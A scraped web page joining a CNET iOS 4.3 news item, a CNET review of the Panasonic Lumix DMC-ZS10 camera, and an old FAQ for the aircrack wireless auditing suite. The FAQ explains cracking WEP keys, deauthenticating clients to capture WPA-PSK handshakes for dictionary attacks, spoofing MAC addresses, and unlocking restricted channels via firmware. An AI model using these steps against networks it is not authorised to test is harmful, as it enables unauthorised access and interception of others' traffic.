2 iOS 4.3 hitting March 11

(Credit: Sarah Tew/CNET)

We previewed iOS 4.3 back in January, and now the time has almost come: the latest version of Apple's iOS software will be available March 11.

What's new this time around? Well, not as much as iOS 4.2, but there are some notable upgrades--especially if you're an iPad owner.

New features in iOS 4.3 (photos)

Support for additional multifinger multitouch gestures and swipes adds four-finger fast-swapping between open apps and a one-handed way to flick the app dock up, instead of double-clicking the home button. In fact, you'll probably be using that lone physical button a whole lot less now.

There's also a new app, Photo Booth, that will add tools for taking and tweaking self portraits, similar to what exist already on Mac OS X. Obviously, this app's limited to the camera-equipped iPad 2.

Home Sharing will allow other PC or Mac iTunes libraries with Home Sharing turned on to be accessible on your iPad, locally streamed.

Wi-Fi hot-spot support will finally enable AT&T iPhones to share their wireless connection with other devices, much like the Verizon iPhone 4.

For Apple TV owners, there are some improvements to video streaming and AirPlay support. AirPlay will also support photo slideshows, as well as well video and audio streaming from third-party apps to other devices.

The built-in Safari browser should also see performance improvements running JavaScript, thanks to a new nitro JavaScript engine.

Other small changes include yet another font switch for Notes, extra notification beep settings, and--thank goodness--an ability to restore the use of the physical iPad's orientation lock switch, which has been co-opted to become a "silencer" switch since iOS 4.2.

Read more

0 Panasonic Lumix DMC-ZS10 (Black)

The good: The Panasonic Lumix DMC-ZS10 has fast shooting performance and an extensive feature set.

The bad: The Panasonic Lumix DMC-ZS10 has a near-pointless touch screen; no raw capture option; noisy photos; and a short battery life.

The bottom line: The Panasonic Lumix DMC-ZS10 is a very good compact megazoom as long as you don't mind paying more for features and speedy performance than photo quality.

Review:

One of the few segments of point-and-shoots that's growing is megazooms, a category that Panasonic pretty much started. Now all manufacturers have them, though, so trying to stand out isn't easy. So for the Lumix DMC-ZS10, the update to 2010's ZS7, Panasonic did what most manufacturers do: made the lens wider and longer, kept the body size the same, and packed in a ton of features.

The basic specs include a 24mm-equivalent wide-angle lens with a 16x zoom (with nano coating to reduce ghosting and flare), a 3-inch, 460K-dot resolution touch-screen LCD, and a 14-megapixel MOS sensor. ... Expand full review

One of the few segments of point-and-shoots that's growing is megazooms, a category that Panasonic pretty much started. Now all manufacturers have them, though, so trying to stand out isn't easy. So for the Lumix DMC-ZS10, the update to 2010's ZS7, Panasonic did what most manufacturers do: made the lens wider and longer, kept the body size the same, and packed in a ton of features.

The basic specs include a 24mm-equivalent wide-angle lens with a 16x zoom (with nano coating to reduce ghosting and flare), a 3-inch, 460K-dot resolution touch-screen LCD, and a 14-megapixel MOS sensor. The sensor is the same type that's found in its top full-size megazoom, the FZ100, and it's paired with Panasonic's Venus Engine FHD processor. This combo allows for high-speed burst shooting--full resolution at 10 frames per second--and full HD movie capture in AVCHD format among other things.

For all its features, though, its photo quality is no better or worse than other recent high-end Panasonic point-and-shoots I've tested. Like those cameras, whether you'll like the photo quality from the ZS10 comes down to how you'll use the photos and how much cropping and enlarging you hope to do.

Key specs	Panasonic Lumix DMC-ZS10
Price (MSRP)	$399.95
Dimensions (WHD)	4.1 x 2.3 x 1.3 inches
Weight (with battery and media)	7.7 ounces
Megapixels, image sensor size, type	15 megapixels, 1/2.3-inch MOS (14 megapixels effective)
LCD size, resolution/viewfinder	3-inch touch-screen LCD, 460K dots/Electronic
Lens (zoom, aperture, focal length)	16x, f3.3-5.9, 24-384mm (35mm equivalent)
File format (still/video)	JPEG/AVCHD (.MTS); Motion JPEG (.MOV)
Highest resolution size (still/video)	4,320x3,240 pixels/ 1,920x1,080 at 60fps (interlaced; 17Mbps), 1,280x720 at 30fps (progressive; 17Mbps)
Image stabilization type	Optical and digital
Battery type, CIPA rated life	Li-ion rechargeable, 260 shots
Battery charged in camera	No; external charger supplied
Storage media	SD/SDHC/SDXC
Bundled software	PHOTOfunSTUDIO 6.1 HD Lite Edition (Windows); Super LoiLoScope trial version (Windows)

With plenty of light, the camera can turn out very good photos, if a little soft. When viewed at full size, there is noise present even at ISO 100. The higher the ISO, the more noise you'll see and the softer your photos get. Yellow blotching from noise is a particular problem with Panasonic's JPEG processing and it's present in varying degrees through its ISO range. It's most visible at ISO 1,600, which pretty much makes that ISO unusable. Panasonic seems to correct for the blotches at ISO 400, but in the process destroys fine detail and makes subjects look smeary. In the end, the ZS10 is best suited for outdoor use or indoors if brightly lit. Photos at or below ISO 200 can stand up to some cropping or larger prints, but low-light photos are best left for small prints and Web use. And unfortunately, with no option for raw capture, you're stuck with Panasonic's image processing.

Sample photos:
Panasonic Lumix DMC-ZS10

While there is little sign of pincushioning when the lens is extended, the wide end of the lens shows some barrel distortion. The lens has good center sharpness and is reasonably consistent edge to edge. Fringing in high-contrast areas can be a bit of an issue for the ZS10. Mainly, it's more than I'm used to seeing from a Panasonic camera, but still average for this class of camera.

Color and exposure is very good from the ZS10 up to ISO 400. Subjects appear natural, bright, and pretty accurate. Plus, there are a number of ways to tweak your color results. White-balance presets are good for the most part; however, the auto white balance is not good indoors. Unfortunately, you're stuck with that setting if you're using Intelligent Auto. Whenever possible, use the presets or take a manual reading, which is really easy to do.

Lastly, though the sensor is 15 megapixels, the camera only uses 14 megapixels, making it possible to have four aspect ratios--16:9, 3:2, 4:3, and 1.1--with the same angle of view across the entire zoom range of the lens.

As for movie quality, its AVCHD clips are sharp with good exposure and color and some of the smoothest motion I've seen from a point-and-shoot. Low-light recording suffers from the same noise problems as in photos. The zoom does operate while recording, but its movement is picked up by the stereo mic. If you are recording in a very quiet environment, you will hear it in your movies, but otherwise it's difficult to hear. The camera also has an option for continuous AF for movies, which performed very well, as did its wind noise filter. Also, the ZS10 can capture 3.5-megapixel photos while shooting video as well as extract single frames for photos when in Playback mode.

General shooting options	Panasonic Lumix DMC-ZS10
ISO sensitivity (full resolution)	Auto, 100, 200, 400, 800, 1,600
White balance	Auto, Daylight, Cloudy, Shade, Incandescent, Manual
Recording modes	Intelligent Auto, Program, Aperture Priority, Shutter Priority, Manual, Custom, MySCN 1 and 2, 3D, Custom, Movie
Focus modes	Face Detection AF, 1-point AF, 1-point AF (high speed), 23-point AF, Spot AF, AF Tracking, Touch AF
Macro	1.2 inches (Wide); 3.3 feet (Tele)
Metering modes	Multi, Center-weighted average, Spot
Color effects	Standard, Black & White, Sepia, Cool, Warm, Happy (only in iA mode)
Burst mode shot limit (full resolution)	15 shots

As Panasonic's highest-end compact megazoom, there is no shortage of shooting options. For automatic shooting there is the company's Intelligent Auto that combines an ever-growing number of technologies to get the best results. Overall, it works very well, but photos can end up appearing overprocessed when viewed at full size. There are 29 scene modes for those times when you want to get specific with your auto shooting or get creative and you can store two favorites to MySCN spots on the mode dial. For the most part they are the ones you'd find on any point-and-shoot, but there are a few artistic ones like High Dynamic and Pinhole as well as a Handheld Night Shot that takes 10 pictures in a row and then combines them into one to reduce motion blur and noise. The down side is that it only works if your subject is stationary. There is an Underwater mode as well, but you'll need a casing if you want to get it wet--the ZS10 is not waterproof in any way. Lastly, many of the scene modes are available for movies, too, giving you a little more freedom to experiment.

For those who like to take more control, the ZS10 does offer aperture-priority, shutter-priority, and manual shooting modes. Apertures are f3.3-6.3 wide and 5.9-6.3 telephoto. Shutter speeds go from 60 seconds to 1/4,000 second. To use them, you press the Exposure button on back, and change the settings with the directional pad. (A thumb dial would've been nice, but space is already pretty tight.) There is also a Custom spot on the mode dial for setting up three custom setting configurations. There's a Program mode, too, should you want to adjust things like ISO, white balance, and exposure compensation (not done with the Exposure button, mind you, but the directional pad), but not worry about shutter speed and aperture settings.

If you shoot a lot of moving subjects, namely children, pets, and sports, the ZS10's multiple burst shooting options give you a lot of flexibility and a fighting chance of getting a good photo. Its fastest burst modes--40 and 60 frames per second--are at reduced resolutions, but Panasonic packed in three at full resolution. There's one that captures up to 15 shots at 10fps, but that sets focus, exposure, and white balance with the first shot. What's better are the 2fps and 5fps options that set those things with each shot so you're able to get a subject moving moderately fast in focus and properly exposed. However, in our lab tests the 5fps setting averaged 3.2fps.

Other aspects of its shooting performance are excellent as well and significantly faster than its predecessor. Shutter lag is low at 0.4 second and 0.7 second in bright and dim lighting, respectively. From shot-to-shot without the flash you're waiting only 1.1 seconds; adding the flash drags that time to just 1.4 seconds. It's time from off to first shot is 1.9 seconds.

The high-speed shooting also gets you 3D photos. The ZS10 fires off 20 shots as you move the camera horizontally across a scene and then picks the two best for overlaying to create a 3D MPO file that can be played back on 3D-enabled TVs, computers, and photo frames. The results are good, but your subject has to be motionless as does everything in the scene. Any movement really kills the effect. It's a nice extra to play with, but not a must-have mode.

The ZS10's controls are well spaced and easy to use, but its touch screen is under used.

The appearance of the ZS10 doesn't change much from its predecessor, the ZS7. Its weight and size are approximately the same, remaining remarkably compact for its features and wide-angle lens with 16x zoom (that's wider and longer than its predecessor). Though it's a tight fit in a pants pocket, the ZS10 easily fits in an average jacket pocket or small handbag. The body--available in black, brown, silver, blue, and red versions--has a nice, solid feel to it with a comfortable grip on the right side.

The 3-inch touch screen on the back looks good and gets reasonably bright, though it gets reflective in direct sunlight, so you may struggle occasionally to see what you're shooting. Also, Panasonic didn't do much with the touch screen, only using it for a handful of functions. For example, you can use it to focus and shoot photos by tapping on your subject, but menu navigation is primarily done with the directional pad. In playback you can use it to flip through your shots, but you can't do any editing or drawing or writing on photos. It just seems that if you're going to be paying for a touch screen, you should get more use out of it.

One of the main attractions of the ZS10 is the built-in GPS. Using it is fairly simple, and the process has been streamlined from the ZS7 thanks to a dedicated spot in the menu system. Once you've turned on the receiver--it can be done from the Q.Menu or main menu--you can have the camera retrieve the information for your current location. In tests this took anywhere from less than a minute to several minutes depending on how much open sky was above me. Once locked, the ZS10 can display country, state, city, and landmark information and continues to update itself every minute. You can then go into the GPS Area Select menus and pick the correct information for your location. For example, if you're standing in the middle of New York, it could quite possibly have a couple pages of landmarks to pick from. Also, you can choose to limit what area information is attached, in case you only want the name of the city for instance. The area information covers 173 countries or regions for all over the world and more than half a million landmarks in 73 countries or regions.

For everyday shooting, attaching GPS information is probably not that exciting. But, if you do a lot of traveling, hiking, or other activity where you might want to remember where you were, then it's a great feature to have. Longitude and latitude is seamlessly added to the EXIF data and, again, you can have the camera include country, city, state, and landmarks.

There's an option to record AVCHD movies with GPS data as well. The location information can be viewed when videos are played back on a computer using the bundled software or directly from the camera. Unless you simply must have the information, you'll probably want to stick with the non-GPS AVCHD format option.

One last thing regarding the GPS: once you've turned it on, the receiver stays on until you turn it off, 2 hours have passed since it's refreshed its position, or after 3 hours of the camera being off. So even if you shut off the camera, it'll continue to update its location every 15 minutes. This is fine if you're shooting for an extended period of time, but it'll eventually run down your battery. If you want the GPS to turn off when you shut the camera off, you must select the Airplane mode option from the camera's menu. This is all explained in the manual, but battery life is something to keep in mind with features like GPS.

In fact, battery life with the ZS10 is an issue in general. With the GPS, touch screen, zoom, burst shooting, and HD movie capture there's a lot here to drain its small rechargeable battery. Even without all those things, the camera's battery life is pretty short. I strongly recommend picking up an extra battery if you're going to be traveling with the ZS10 or even just out for a day of shooting.

Conclusion
The cost of the Panasonic Lumix DMC-ZS10 goes primarily to its abundant feature set. That fortunately includes some very fast shooting performance and a nice zoom lens in a pocketable body. It's not unreasonable to expect excellent photos, too, for its price, but the fact is the ZS10 is still a point-and-shoot with a sensor no bigger than you'd find in a smaller, less feature-laden camera. If you're after awesome low-light photos or need to regularly make large prints, you probably shouldn't consider this camera. But if most of your photos are for sharing online and 8x10 prints or smaller, the ZS10 is a very good option. Especially if you want something that can double as a pocket video camera.

Shooting speed (in seconds)
(Shorter bars indicate better performance)

Time to first shot

Typical shot-to-shot time

Shutter lag (dim)

Shutter lag (typical)

Nikon Coolpix S8100

1.1

1.5

0.7

0.4

Panasonic Lumix DMC-ZS10

1.9

1.1

0.7

0.4

Sony Cyber-shot DSC-HX5V

1.8

1.5

0.8

0.4

Canon PowerShot SD4500 IS

2.9

2.3

0.8

0.6

Panasonic Lumix DMC-ZS7

2.3

2.1

1

0.6

Typical continuous-shooting speed
(Longer bars indicate better performance)

Nikon Coolpix S8100

10

Sony Cyber-shot DSC-HX5V

10

Canon PowerShot SD4500 IS

3.6

Panasonic Lumix DMC-ZS10

3.2

Panasonic Lumix DMC-ZS7

1.7

Read more: http://reviews.cnet.com/digital-cameras/panasonic-lumix-dmc-zs10/4505-6501_7-34505718.html#ixzz1FU9MuIY2

Read more

0 aircrack - set of tools for auditing wireless networks

What is aircrack ?

aircrack is a set of tools for auditing wireless networks:

• airodump: 802.11 packet capture program
• aireplay: 802.11 packet injection program
• aircrack: static WEP and WPA-PSK key cracker
• airdecap: decrypts WEP/WPA capture files

This document has been translated in spanish language (thanks to ShaKarO).

Is there an aircrack discussion forum ?

Sure: http://100h.org/forums/. Also, check out #aircrack on irc.freenode.net

Where to download aircrack ?

The official download location is http://www.cr0.net:8040/code/network/. However, if you can't access port 8040 for some reason, you may use this mirror instead: http://100h.org/wlan/aircrack/.

Aircrack is included in the Troppix LiveCD, which features { Prism2 / PrismGT / Realtek / Atheros / Ralink } drivers patched for packet injection, as well as the acx100, ipw2200 (Centrino) and zd1211 drivers.

It says "cygwin1.dll not found" when I start aircrack.exe.

You can download this library from: http://100h.org/wlan/aircrack/.

To use aircrack, drag&drop your .cap or .ivs capture file(s) over aircrack.exe. If you want to pass options to the program you'll have to start a shell (cmd.exe) and manually type the command line; there is also a GUI for aircrack, developed by hexanium.

Example:

C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap ...

See below for a list of options.

How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack on the resulting capture file. aircrack will then perform a set of statistical attacks developped by a talented hacker named KoreK.

How do I know my WEP key is correct ?

There are two authentication modes for WEP:

• Open-System Authentication: this is the default mode. All clients are accepted by the AP, and the key is never checked: association is always granted. However if your key is incorrect you won't be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will timeout.
• Shared-Key Authentication: the client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it's never enabled by default.

In summary, just because you seem to have successfully connected to the access point doesn't mean your WEP key is correct ! To check your WEP key, try to decrypt a capture file with the airdecap program.

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you're out of luck you may need two million IVs, or more.

There's no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump can not report the WEP key length. Thus, it is recommended to run aircrack twice: when you have 250.000 IVs, start aircrack with "-n 64" to crack 40-bit WEP. Then if the key isn't found, restart aircrack (without the -n option) to crack 104-bit WEP.

I can't seem to capture any IVs !

Possible reasons:

• You are standing too far from the access point.
• There is no traffic on the target wireless network.
• There is some G traffic but you're capturing in B mode.
• Something is wrong with your card (firmware problem ?)

By the way, beacons are just unencrypted announcement packets. They're totally useless for WEP cracking.

I've been unable to crack this AP !

Shit happens.

Why is there no Windows version of aireplay ?

The PEEK driver doesn't support 802.11 packet injection; I will not port aireplay on Win32. However, there are commercial alternatives:

Prism cards: http://www.tuca-software.com/transmit.php

Atheros cards: http://www.tamos.com/htmlhelp/commwifi/pgen.htm

Is my card compatible with airodump / aireplay ?

First of all, search Google to find which chipset your card has. For example, if you have a Linksys WPC54G search for "wpc54g chipset linux".

Chipset	Supported by airodump for Windows ?	Supported by airodump for Linux ?	Supported by aireplay for Linux ?
HermesI	YES (Agere driver)	YES (patched orinoco driver)	NO (firmware corrupts the MAC header)
Prism2/3	NO, but see LinkFerret for an alternative	YES (HostAP or wlan-ng driver), STA firmware 1.5.6 or newer required	YES (PCI and CardBus only, driver patching required)
PrismGT	YES (PrismGT driver)	FullMAC: YES (prism54 driver, SoftMAC: NOT YET (prism54usb)	YES (driver patching recommended)
Atheros	CardBus: YES (Atheros driver), PCI: NO (see CommView WiFi instead)	YES (PCI and CardBus only, madwifi driver)	YES (driver patching required)
RTL8180	YES (Realtek driver)	YES (rtl8180-sa2400 driver)	UNSTABLE (driver patching required)
Aironet	YES? (Cisco driver)	YES (airo driver, firmware 4.25.30 recommended)	NO (firmware issue)
Ralink	NO	YES (rt2500 / rt2570 driver)	YES (driver patching required)
Centrino b	NO	PARTIAL: the ipw2100 driver doesn't discard corrupted packets	NO
Centrino b/g	NO	YES (ipw2200 driver, 1.0.6 recommended)	NO (firmware drops packets)
Broadcom	Old models only (BRCM driver)	NOT YET (bcm43xx driver, Linux >= 2.6.14 required)	NO
TI (ACX100 / ACX111)	NO	UNTESTED (acx100 driver)	NO
ZyDAS 1201	NO	YES (zd1211 driver)	NO
Others (Marvel...)	NO	UNKNOWN	NO

The PEEK driver does not recognize my card.

Some cards are not recognized by the Windows drivers above, even though they have the correct chipset. In this case, open the hardware manager, select your card, "Update the driver", select "Install from a specific location", select "Don't search, I will choose the driver to install", click "Have disk", set the path to where the driver has been unzipped, uncheck "Show compatible hardware", and finally choose the driver.

I have a Prism2 card, but airodump / aireplay doesn't seem to work !

First step, make sure you aren't using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver (use cardctl ident to know you card identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

Also, it can be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date -- see below for instructions. The recommended station firmware version is 1.7.4. If it doesn't work well (kismet or airodump stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones).

On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices w/ wlan-ng.

Note: a Windows XP driver for Prism2 cards with WPA/TKIP support can be found here: http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe.

I have an Atheros card, and the madwifi patch crashes the kernel /
aireplay keeps saying enhanced RTC support isn't available.

There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11 was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is just broken. Thus, is it highly recommended to use either Linux 2.6.11.x or newer.

How do I update my Prism2 firmware ?

The simplest is to upgrade the firmware with WinUpdate - this requires to have the WPC11 driver v2.5 installed. Both can be found at: http://100h.org/wlan/linux/prism2/.

You may also update the firmware with patched HostAP (see below for instructions on how to patch and install HostAP). Alternatively, you may boot the Troppix Live CD (which already has a patched hostap driver and the prism2_srec utility).

Now that HostAP is loaded, you can check your firmware's primary and station version with this command:

# dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1  (primary firmware is 1.1.1)
wifi0: STA: id=0x1f v1.7.4  (station firmware is 1.7.4)
wifi0: registered netdevice wlan0

If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2 and MUST use STA firmware version 1.5.6 (s1010506.hex). Otherwise, you should use PRI 1.1.1 / STA 1.7.4 which is the most stable firmware version for newer Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people have reported having trouble with them.

To update the firmware, you'll need prism2_srec from the hostap-utils package; if it's not present on your system, download and compile hostap-utils:

wget http://100h.org/wlan/linux/prism2/hostap-utils-0.4.0.tar.gz
tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0
make

Some Prism2 cards have been restricted to a certain set of channels because of country regulation. You can activate all 14 channels with the following commands:

./prism2_srec wlan0 -D > pda; cp pda pda.bak
Edit pda and put 3FFF at offset 0104 (line 24)

Finally, download the firmware and flash your card. If the NIC id is between 0x8002 and 0x8008:

wget http://100h.org/wlan/linux/prism2/s1010506.hex
./prism2_srec -v -f wlan0 s1010506.hex -P pda

Otherwise:

wget http://100h.org/wlan/linux/prism2/pk010101.hex
wget http://100h.org/wlan/linux/prism2/sf010704.hex
./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda

If you get the message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported", the HostAP driver is not loaded and you must install it. If you get the message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported", then your HostAP driver has not been patched for non-volatile download support.

Which is the best card to buy ?

The best chipset nowadays is Atheros; it is very well supported under Linux, and also under Windows (PCMCIA/CardBus only). The latest madwifi patch makes it possible to inject raw 802.11 packets either in Managed and Monitor mode at arbitrary b/g speeds.

Ralink makes some nice b/g chipsets, and has been very cooperative with the open-source community to release GPL drivers. Packet injection is now fully supported under Linux on PCI/CardBus RT2500 cards, and also works on USB RT2570 devices.

Here's a list of recommended cards:

Card name	Type	Chipset	Antenna	Price	Windows support	Linux support
MSI PC54G2	PCI	Ralink	RP-SMA	E30	No	Yes
MSI CB54G2	CardBus	Ralink	Internal	E30	No	Yes
Linksys WMP54G v4	PCI	Ralink	RP-SMA	E40	No	Yes
Linksys WUSB54G v4	USB	Ralink	Internal	E40	No	Yes
D-Link DWL-G122	USB	Ralink	Internal	E45	No	Yes
Netgear WG111	USB	PrismGT SoftMAC	Internal	E40	airodump	No
Netgear WG311T	PCI	Atheros	RP-SMA	E50	CommView WiFi	Yes
Netgear WG511T	CardBus	Atheros	Internal	E50	airodump	Yes
Netgear WAG511	CardBus	Atheros	Internal	E100	airodump	Yes
Proxim 8470-WD	CardBus	Atheros	MC + Int.	E110	airodump	Yes

Note: there are some cheaper models with a similar name (WG511, WG311 and DWL-G520+); those cards are not Atheros-based. Also, the Peek driver does not support recent Atheros cards, so you'll have to use CommView WiFi instead.

How do I use airodump for Windows ?

First of all, make sure that your card is compatible (see table above) and that you have installed the proper driver.

When running airodump, you should specify:

• The network interface index number, which must be picked in the list displayed by airodump.
• The network interface type ('o' for HermesI and Realtek, 'a' for Aironet, Atheros, Broadcom and PrismGT).
• The channel number, between 1 and 14. You can also specify 0 to hop between all channels.
• The output prefix. For example, if the prefix is "foo", then airodump will create foo.cap (captured packets) and foo.txt (CSV statistics). If foo.cap already exists, airodump will resume the capture session by appending the packets to it.
• The "only IVs" flag. Specify 1 if you just want to save the IVs from WEP data packets. This saves space, but the resulting file (foo.ivs) will only be useful for WEP cracking.

To stop capturing packets, press Ctrl-C. You may get a blue screen, this is due to a bug in the PEEK driver not cleanly exiting monitor mode. Also, the capture file may be empty. The cause of this bug is unknown.

Why can't I compile airodump and aireplay on BSD / Mac OS X ?

Both airodump and aireplay sources are linux-specific. There are no plans to port them on any other operating system.

How do I use airodump for Linux ?

Before running airodump, you may start the airmon.sh script to list the detected wireless interfaces. It is possible, but not recommended, to run Kismet and airodump at the same time.

  usage: airodump  
 [channel] [IVs flag]

 Specify 0 as the channel to hop between 2.4 GHz channels.
 Set the optional IVs flag to 1 to only save the captured
 IVs - the resulting file is only useful for WEP cracking.

 If the gpsd daemon is running, airodump will retrieve and
 save the current GPS coordinates in text format.

You can convert a .cap / .dump file to .ivs format with the pcap2ivs program (linux only).

airodump keeps switching between WEP and WPA.

This is happening because your driver doesn't discard corrupted packets (that have an invalid CRC). If it's a Centrino b, it just can't be helped; go buy a better card. If it's a Prism2, try upgrading the firmware.

What's the meaning of the fields displayed by airodump ?

airodump will display a list of detected access points, and also a list of connected clients ("stations"). Here's an example screenshot using a Prism2 card with HostAP:

BSSID PWR Beacons # Data CH MB ENC ESSID 00:13:10:30:24:9C 46 15 3416 6 54. WEP the ssid 00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR BSSID STATION PWR Packets Probes 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 the ssid 00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 the ssid

Field	Description
BSSID	MAC address of the access point.
PWR	Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher you get closer to the AP or the station. If PWR == -1, the driver doesn't support signal level reporting.
Beacons	Number of announcements packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
# Data	Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
CH	Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump is not hopping, because of radio interference.
MB	Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported.
ENC	Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA), WEP (without the question mark) indicates static or dynamic WEP, and WPA if TKIP or CCMP is present.
ESSID	The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump will try to recover the SSID from probe responses and association requests.
STATION	MAC address of each associated station. In the screenshot above, two clients have been detected (00:09:5B:EB:C5:2B and 00:02:2D:C1:5D:1F).

How do I merge multiple capture files ?

You may use the mergecap program (part of the ethereal-common package or the win32 distribution):

mergecap -w out.cap test1.cap test2.cap test3.cap

.ivs files can be merged with the "mergeivs" program (linux only).

Can I use Ethereal to capture 802.11 packets ?

Under Linux, simply setup the card in monitor mode with the airmon.sh script. Under Windows, Ethereal can NOT capture 802.11 packets.

Can Ethereal decode WEP data packets ?

Yes. Go to Edit -> Preferences -> Protocols -> IEEE 802.11, select 1 in the "WEP key count" and enter your WEP key below.

How do I change my card's MAC address ?

Under linux: for example, if you have an Atheros card:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Under Windows, you may use macmakeup.

How do I use aircrack ?

Usage: aircrack [options]

You can specify multiple input files (either in .cap or .ivs format). Also, you can run both airodump and aircrack at the same time: aircrack will auto-update when new IVs are available.

Here's a summary of all available options:

Option	Param.	Description
-a	amode	Force attack mode (1 = static WEP, 2 = WPA-PSK).
-e	essid	If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is not broadcasted (hidden).
-b	bssid	Select the target network based on the access point's MAC address.
-p	nbcpu	On SMP systems, set this option to the number of CPUs.
-q	none	Enable quiet mode (no status output until the key is found, or not).
-c	none	(WEP cracking) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).
-t	none	(WEP cracking) Restrict the search space to binary coded decimal hex characters.
-d	start	(WEP cracking) Set the beginning the WEP key (in hex), for debugging purposes.
-m	maddr	(WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network.
-n	nbits	(WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.
-i	index	(WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
-f	fudge	(WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success.
-k	korek	(WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-x	none	(WEP cracking) Enable bruteforcing of the last two keybytes.
-y	none	(WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.
-w	words	(WPA cracking) Path to a wordlist.

Could you implement a resume option in aircrack ?

There are no plans to implement this feature.

How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay. Also, a good dictionary is required; see
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

FYI, it's not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.

Will WPA be cracked in the future ?

It's extremely unlikely that WPA will be cracked just like WEP was.

The major problem with WEP is that the shared key is appended to the IV; the result is directly used to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext bytes are strongly correlated with the shared key (see Andrew Roos' paper). There are basically two counter-measures against this attack: 1. mix the IV and the shared key using a hash function or 2. discard the first 256 bytes of RC4's output.

There has been some disinformation in the news about the "flaws" of TKIP:

For now, TKIP is reasonably secure but it is also living on borrowed time since it still relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there's no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionnary attack, which fails if the passphrase is robust enough.

WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither are going to be cracked in the near future.

I have more than one million IVs, but aircrack doesn't find the key !

Possible reasons:

• Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed.
  
• If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static (EAP/802.1X in use ?).
  
• A false positive prevented the key from being found. Try to disable each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the experimental bruteforce attacks (-x / -y).

I've found the key, how do I decrypt a capture file ?

You may use the airdecap program:

  usage: airdecap [options] 

     -l       : don't remove the 802.11 header
     -b bssid : access point MAC address filter
     -k pmk   : WPA Pairwise Master Key in hex
     -e essid : target network ascii identifier
     -p pass  : target network WPA passphrase
     -w key   : target network WEP key in hex

 examples:

 airdecap -b 00:09:5B:10:BC:5A open-network.cap
 airdecap -w 11A3E229084349BC25D97E2939 wep.cap
 airdecap -e 'the ssid' -p passphrase  tkip.cap

How do I recover my WEP key in Windows ?

You may use the WZCOOK program which recovers WEP keys from XP's Wireless Zero Configuration utility. This is experimental software, so it may or may not work depending on your service pack level.

Does WZCOOK also recovers WPA keys ?

